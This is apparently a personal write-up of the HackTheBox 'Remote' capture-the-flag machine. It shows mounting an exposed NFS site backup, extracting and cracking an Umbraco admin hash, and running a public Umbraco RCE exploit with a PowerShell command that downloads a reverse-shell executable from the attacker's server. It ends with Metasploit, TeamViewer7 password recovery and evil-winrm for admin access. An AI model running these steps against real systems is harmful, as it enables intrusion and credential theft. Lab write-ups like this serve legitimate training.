![c3188b606d8943d147e162e47f51d6c5.png](4a8c67e643024c2f9bc5438bb7df6744.png) ![fc1829a82085cd6576f9b245213c77bb.png](ec727d2125d24302b186df2c27d61af3.png) Interesting. FTP, Webserver and looks like some nfs that we can maybe mount Let's check out the website ![934d9b48ace9ff750232a5667a2bad8a.png](6691c9dc21bb4b33a583b309772a531c.png) Looks to have some sort of blog. 'Umbraco'? ![9e12cd8aaf5aeb2bd91e22931f7f7b5a.png](62a7c5ffc8f6462c95a3580bdac3fc56.png) ![2eefa8535dc21aaf6a19c0c6d85ad48b.png](f435e26ac528441cbf5207f9bfc7b15c.png) So we've found the login form by clicking 'Go to back office and install forms'. Nice. Default creds don't work here, so we'll come back to it. Let's see if there's anything to mount ![680f38f1352bd58e6990fe5a2bbd6568.png](16b437cee6eb49e7b752e6e31dcf50b7.png) Interesting, let's mount it! `sudo mount -t nfs /home/kali/ctf/htb/remote/mount` Exactly what it says. Full site backup. Since we know the backend is Umbraco, we can find the version in the `Web.config` file and credentials in the `App_Data/Umbraco.sdf` file. Version: ![520d41fcddeb11a8b6fcf267b222d8a2.png](389bdf8b49584bc9a4ed0b57fe7b0250.png) Creds: Running strings on Umbraco.sdf and redirecting it to a file, we can then run head on that file to see the creds `strings Umbraco.sdf > dbstrings` ![d161a01b667649ae7416a8474f6745a7.png](a77842f87aa6445795ba10fcb1144732.png) So the admin password is a SHA1 hash. Crack it and log in using the forms we found earlier [email protected]:cracked password Now that we have admin authenitcation and know the version, we can try to find an exploit. [https://github.com/noraj/Umbraco-RCE](https://github.com/noraj/Umbraco-RCE) This one looks promising and easy to use. Let's test it ![53d7c91b60b9b320e109a837f28d0821.png](3e90ba42e1fa472e9181ab1653c5a7ab.png) It works! We now have remote code execution. Let's get a proper shell ![e6e5af2dd00a7214581bd1e5fb874d86.png](41b6aba2ef1b467b8f5b61dfe718b99e.png) Transfer that executable to the machine using our RCE exploit `python3 -m http.server` `python3 exploit.py -u [email protected] -p password -i '' -c powershell.exe -a '-NoProfile -Command Invoke-WebRequest -Uri -OutFile C:/Users/Public/rev.exe'` Now that our shell is on the box, let's fire up the metasploit listener ![82db5def78ca10ed545e7801d0a63e1f.png](4727de30ccce4121a85f146eb913a836.png) trigger the shell and off we go So let's enumerate this box a bit. I like winPEAS. ![3be04f754cd3a64f815b5390d869846b.png](dda8d988c67f457b8f16b988c392955d.png) Drop into a shell and run it ![c64af1859dc8c8c98f97ebd0d4caf3e3.png](e7819098fd2d488eb6fccb2611212600.png) Interesting. Looks like TeamViewer7 is running. That's vulnerable. Let's target it. Terminate your shell (ctrl+c) and background (bg) your meterpreter session ![6e642346f530eb72c3cd0fdc3878b726.png](c18eb17cb4b94d6abf48669e40e1242d.png) ![27ca70314635b1b07a3fd56cef9aa236.png](abdd00a2abc74d9596eca64ac2aa8472.png) Could that be the admin password? Let's use evil-winrm to check ![51dc6c697729e18dc164a8aa7f4447be.png](808a161f567041f486cbe465dcc97ffe.png) Successfully rooted. ![44e8359e967709fd4a52b279c7095cbf.png](d83298ac607441a794c0f6c492503f5d.png) ![27421801b8950549bd5ef04345ef653a.png](45bea55163274c2d9d20f8deb1332616.png) --- Back to [[HackTheBox Index]] Tags: #htb #hackthebox #nfs #box_writeups #umbraco #hashcracking #metasploit #windows #teamviewer7 #evil_win_rm Related: